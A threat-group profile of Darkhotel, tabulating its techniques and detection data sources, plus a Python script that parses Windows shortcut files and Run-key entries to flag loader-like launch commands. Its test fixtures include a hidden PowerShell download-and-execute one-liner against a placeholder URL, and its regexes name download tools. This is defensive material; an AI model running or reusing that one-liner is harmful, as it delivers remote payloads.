Darkhotel is a threat group that has been active since at least 2004. The group has conducted activity on hotel and business center Wi‑Fi and physical connections as well as peer-to-peer and file sharing networks. The actors have also conducted spearphishing. (Citation: Kaspersky Darkhotel)
Platform | Tactic | Technique | Description | Data Sources |
---|---|---|---|---|
Windows, macOS, Linux | initial-access | Spearphishing Attachment | Darkhotel has sent spearphishing emails with malicious RAR attachments. | File monitoring, Packet capture, Network intrusion detection system, Detonation chamber, Email gateway, Mail server |
Linux, macOS, Windows, AWS, GCP, Azure | discovery | System Information Discovery | Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine. | Azure activity logs, Stackdriver logs, AWS CloudTrail logs, Process monitoring, Process command-line parameters |
Linux, Windows, macOS | execution | User Execution | Darkhotel sent spearphishing emails with malicious attachments that required users to click on an image in the document to drop the malware to disk. | Anti-virus, Process command-line parameters, Process monitoring |
Windows | defense-evasion | Deobfuscate/Decode Files or Information | Darkhotel has decrypted strings and imports using RC4 during execution. | File monitoring, Process monitoring, Process command-line parameters |
Windows, Linux, macOS, SaaS | initial-access | Drive-by Compromise | Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware. | Packet capture, Network device logs, Process use of network, Web proxy, Network intrusion detection system, SSL/TLS inspection |
Linux, macOS, Windows | discovery | System Network Configuration Discovery | Darkhotel has collected the IP address and network adapter information from the victim’s machine. | Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion | Obfuscated Files or Information | Darkhotel has obfuscated code used in an operation using RC4 and other methods. | Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering, Binary file metadata, Process command-line parameters, Environment variable, Process monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection |
macOS, Windows | discovery | Security Software Discovery | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system. | File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | discovery | Process Discovery | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system. | Process monitoring, Process command-line parameters |
Windows | persistence | Shortcut Modification | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file. | File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion, execution | Scripting | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file. | Process monitoring, File monitoring, Process command-line parameters |
Windows | lateral-movement, initial-access | Replication Through Removable Media | Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers. | File monitoring, Data loss prevention |
macOS, Windows | defense-evasion | Code Signing | Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them. | Binary file metadata |
Windows | lateral-movement | Taint Shared Content | Darkhotel used a virus that propagates by infecting executables stored on shared drives. | File monitoring, Process monitoring |
Linux, macOS, Windows | collection, credential-access | Input Capture | Darkhotel has used a keylogger. | Windows Registry, Kernel drivers, Process monitoring, API monitoring |
Windows | persistence | Registry Run Keys / Startup Folder | Darkhotel has been known to establish persistence by adding programs to the Run Registry key. | Windows Registry, File monitoring |
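A detection-side companion to the Shortcut Modification, Scripting and Registry Run Keys rows above. The Python below is an added example written for this page; it is not code from ATT&CK, Kaspersky or any Darkhotel sample. It parses the StringData section of a .lnk file per the MS-SHLLINK layout, recovers the command line the shortcut would launch, and applies the same launcher heuristics to Run-key values. The shortcut bytes and the Run-key entries are constructed fixtures; the script-host path, the example.invalid URL and the regex patterns are assumptions for illustration, not indicators taken from the cited reporting.

```python
import re
import struct

# MS-SHLLINK: fixed 76-byte ShellLinkHeader, then optional IDList and LinkInfo,
# then StringData blocks in a fixed order selected by LinkFlags.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_HAS_ID_LIST, FLAG_HAS_LINK_INFO = 0x01, 0x02
FLAG_HAS_NAME, FLAG_HAS_RELATIVE_PATH = 0x04, 0x08
FLAG_HAS_WORKING_DIR, FLAG_HAS_ARGUMENTS = 0x10, 0x20
FLAG_HAS_ICON_LOCATION, FLAG_IS_UNICODE = 0x40, 0x80
STRING_FIELDS = ((FLAG_HAS_NAME, "name"), (FLAG_HAS_RELATIVE_PATH, "relative_path"),
                 (FLAG_HAS_WORKING_DIR, "working_dir"), (FLAG_HAS_ARGUMENTS, "arguments"),
                 (FLAG_HAS_ICON_LOCATION, "icon_location"))

# Triage heuristics (assumptions, tune per environment): a shortcut or autorun that
# hands off to a script host, references a remote fetch, or lives in user-writable space.
SCRIPT_HOSTS = re.compile(r"(?:^|[\\/\s\"])(?:cmd|powershell|pwsh|wscript|cscript|mshta|"
                          r"rundll32|regsvr32)(?:\.exe)?\b", re.I)
DOWNLOAD_HINTS = re.compile(r"https?://|ftp://|DownloadString|DownloadFile|Invoke-WebRequest|"
                            r"\biwr\b|\bcurl\b|bitsadmin|certutil|WebClient|Start-BitsTransfer", re.I)
USER_WRITABLE = re.compile(r"c:\\users\\|c:\\programdata\\|\\appdata\\|\\temp\\", re.I)


def _string_data(text):
    """One StringData block: CountCharacters (uint16) followed by UTF-16LE characters."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments=None):
    """Build a minimal Unicode .lnk carrying only RELATIVE_PATH and optional ARGUMENTS (test fixture)."""
    flags = FLAG_HAS_RELATIVE_PATH | FLAG_IS_UNICODE | (FLAG_HAS_ARGUMENTS if arguments is not None else 0)
    # HeaderSize, CLSID, LinkFlags, FileAttributes(ARCHIVE), 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = _string_data(relative_path)
    if arguments is not None:
        body += _string_data(arguments)
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk as a dict; skips IDList and LinkInfo without decoding them."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & FLAG_HAS_ID_LIST:            # IDListSize (uint16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINK_INFO:          # LinkInfoSize (uint32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & FLAG_IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            raw = data[pos:pos + count * (2 if unicode else 1)]
            pos += len(raw)
            fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
    return fields


def classify_launcher(command_line):
    """Return the list of heuristic reasons a launch command looks like a dropper/loader hand-off."""
    reasons = []
    if SCRIPT_HOSTS.search(command_line):
        reasons.append("script-host")
    if DOWNLOAD_HINTS.search(command_line):
        reasons.append("download")
    if USER_WRITABLE.search(command_line):
        reasons.append("user-writable-path")
    return reasons


def audit_lnk(data):
    """(effective command line, reasons) for one .lnk file's bytes."""
    fields = parse_lnk(data)
    command = " ".join(filter(None, (fields.get("relative_path"), fields.get("arguments"))))
    return command, classify_launcher(command)


def audit_run_keys(entries):
    """{value name: reasons} for the Run-key (name, command) pairs that trip a heuristic."""
    return {name: classify_launcher(cmd) for name, cmd in entries if classify_launcher(cmd)}


# Constructed fixtures. The lure mirrors the table's pattern (a paint-app shortcut that really
# starts a shell and fetches a payload); host and URL are placeholders, not real indicators.
SAMPLE_LURE_LNK = build_lnk("..\\..\\Windows\\System32\\cmd.exe",
                            "/c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                            ".DownloadString('http://example.invalid/p.ps1')\"")
SAMPLE_BENIGN_LNK = build_lnk("..\\..\\Windows\\System32\\mspaint.exe")
SAMPLE_RUN_KEYS = [
    ("OneDrive", "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"),
    ("Updater", "C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"),
    ("Sync", "wscript.exe //B C:\\ProgramData\\sync.vbs"),
]

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE_LNK), ("benign", SAMPLE_BENIGN_LNK)):
        print(label, audit_lnk(blob))
    print(audit_run_keys(SAMPLE_RUN_KEYS))
```

On a live host, feed `audit_lnk` the bytes of each .lnk under the per-user and all-users Startup folders (and anywhere else a shortcut was recently written), and feed `audit_run_keys` the name/value pairs enumerated from the HKCU and HKLM `...\CurrentVersion\Run` keys. The parser deliberately skips the IDList and LinkInfo structures, so a shortcut whose target lives only in those structures yields an empty command line; treat that as "needs a fuller parser", not as clean. The heuristics are a triage filter, not a verdict: a signed updater in ProgramData will trip the path rule, and a loader that launches a renamed copy of a script host will not trip the host rule.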